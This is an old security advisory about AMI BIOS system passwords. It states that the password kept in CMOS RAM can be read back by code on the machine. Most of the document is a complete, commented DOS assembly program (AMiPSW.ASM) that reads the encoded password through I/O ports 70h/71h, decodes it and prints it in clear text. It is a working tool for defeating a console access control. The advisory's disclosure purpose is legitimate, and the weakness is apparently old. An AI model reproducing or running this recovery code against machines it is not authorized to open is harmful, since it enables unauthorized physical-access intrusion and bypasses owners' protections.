COMMAND
BIOS
SYSTEMS AFFECTED
Systems running an AMI BIOS
PROBLEM
Recently there are many hosts running Linux, FreeBSD, etc. Many
administrators believe that the System Password supported by the main
board is fully secure and will stop a console attacker from breaking
in while sitting in front of the system. But this is a very insecure
assumption: the password is kept in CMOS RAM, which code running on
the machine with I/O port access can read back through ports 70h/71h,
as the program below does.
The following code worked a few years ago on a 486 machine. If
AMI hasn't changed things much, it may still work.
----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall
; 16-bit MASM-style .COM program: a single CODE segment, entry at offset 100h.
CODE SEGMENT
ORG 100h ;.COM image: DOS loads it at CS:100h, right after the PSP
ASSUME CS:CODE,DS:CODE ;CS and DS both address this segment
Start PROC NEAR
;-----------------------------------------------------------------------
; Start - .COM entry point (ORG 100h; in a .COM CS=DS=ES on entry).
; Reads 7 bytes from CMOS RAM, addresses 0B7h..0BDh, through the
; index/data port pair 70h/71h into the Password buffer, then walks the
; buffer byte by byte: for each byte it counts in CL how many steps of
; the byte transform in Decrypt turn the previous byte into it, and
; prints CL as the decoded character.  Output is bracketed by '[' ']'.
; Exits through DOS INT 21h, AH=4Ch, ERRORLEVEL 0.
; Register roles: CL = CMOS address (read loop) / step counter
;                 (decrypt loop); DI = buffer pointer; CH = working copy
;                 of the previous byte; DH/DL = scratch counters.
; Stack: one PUSH/POP pair (DI) plus the CALLs to CharOut.
;-----------------------------------------------------------------------
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
mov cl,'[' ;Bracket the password v1.1
call CharOut ;display it v1.1 (clobbers AH,DL)
cld ;insure forward v1.1 - STOSB below must advance DI
mov cl,0b7h ;CMOS starting address
;v1.1 lea di,Password
mov di,offset Password ; v1.1  ES:DI = buffer (ES=CS in a .COM)
push di ;save for later v1.1
Read_Password:
mov al,cl ;CMOS address we want
out 70h,al ;select the CMOS index
jmp $+2 ;delay a tick (jump to the next instruction = I/O recovery delay)
in al,71h ;Get password char (CMOS data port)
;v1.1 mov [di],al ;stuff in buffer
;v1.1 inc di ;bump
stosb ;stuff in buffer v1.1 (ES:[DI] = AL, DI += 1)
inc cl ;bump CMOS address
cmp cl,0b7h+7 ;done 7 chars yet? (0B7h..0BDh inclusive)
jnz Read_Password ;not yet
; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1 lea di,Password
pop di ;restore pointer to password v1.1
and byte ptr [di],0f0h ;mask first char (clear its low nibble)
inc di ;point to next char
Decrypt_Next:
; Outer loop: DI -> current byte, [DI-1] = previous byte.
; Stops at the end of the 7-byte buffer or at the first 0 byte.
cmp di,Offset Password+7 ;hit end?
jnl Completed ;yep (signed compare of offsets; fine for a 64K .COM)
cmp byte ptr [di],0 ;current char a 0?
jz Completed ;yep, 0 terminated
xor cl,cl ;handy 0 - CL counts transform steps
mov ch,byte ptr [di-1] ;get previous char
Decrypt:
; Inner loop: apply one transform step to CH and bump CL until CH
; equals the current byte; CL is then printed as the character.
; One step: DH = number of set bits among bits 7,6,1,0 of CH;
; CH = CH >> 1, with bit 7 set when that count is odd.
; NOTE(review): if no step count ever produces a match, CL wraps and
; this loop never terminates.
inc cl ;build char in CL
mov ah,ch ;char to decrypt
xor dx,dx ;DH = set-bit count, DL = scratch
test ah,10000000b
jz NotSet7
inc dh ;bit 7 set
NotSet7:
test ah,01000000b
jz NotSet6
inc dh ;bit 6 set
NotSet6:
test ah,00000010b
jz NotSet2
inc dh ;bit 1 set
NotSet2:
test ah,00000001b
jz NotSet1
inc dh ;bit 0 set
NotSet1:
; DL becomes the smallest even value >= DH (at least 2); DL-DH is then
; 1 exactly when DH is odd (0 when DH is 2 or 4, 2 when DH is 0).
add dl,2
cmp dl,dh
jl NotSet1 ;loop
sub dl,dh
shr ch,1 ;shift the previous char right one bit
cmp dl,1 ;odd count of the tested bits?
jnz $+5 ;no: skip the 3-byte ADD below ($+5 = 2-byte JNZ + 3-byte ADD)
add ch,80h ;yes: set bit 7 of the shifted value
cmp ch,byte ptr [di] ;match next char?
jnz Decrypt ;nope, continue
; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
mov ah,2 ;display char function
mov dl,cl ;this char (the step count)
int 21h
inc di ;next char
jmp Decrypt_Next ;loop
; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
mov cl,']' ;Close the bracket v1.1
call CharOut ;display it v1.1
mov ax,4c00h ;terminate, ERRORLEVEL 0
int 21h
Start ENDP
;v1.1 New function: enter with char to display in CL
CharOut PROC NEAR ;v1.1
; CharOut - print the character in CL through DOS INT 21h, function 02h.
; In:    CL = character to display
; Clobb: AH, DL (presumably AL as well, via INT 21h - not relied upon here)
mov dl,cl ;DOS wants the character in DL
mov ah,02h ;INT 21h function 2: console output
int 21h
ret
CharOut ENDP
;Password DB 6 DUP (?)
; Zero-size label at the end of the code: the 7 bytes STOSB writes in
; Start land in the free memory following the program image.
Password label byte ;dynamic buffer v1.1
CODE ENDS
END Start ;program entry point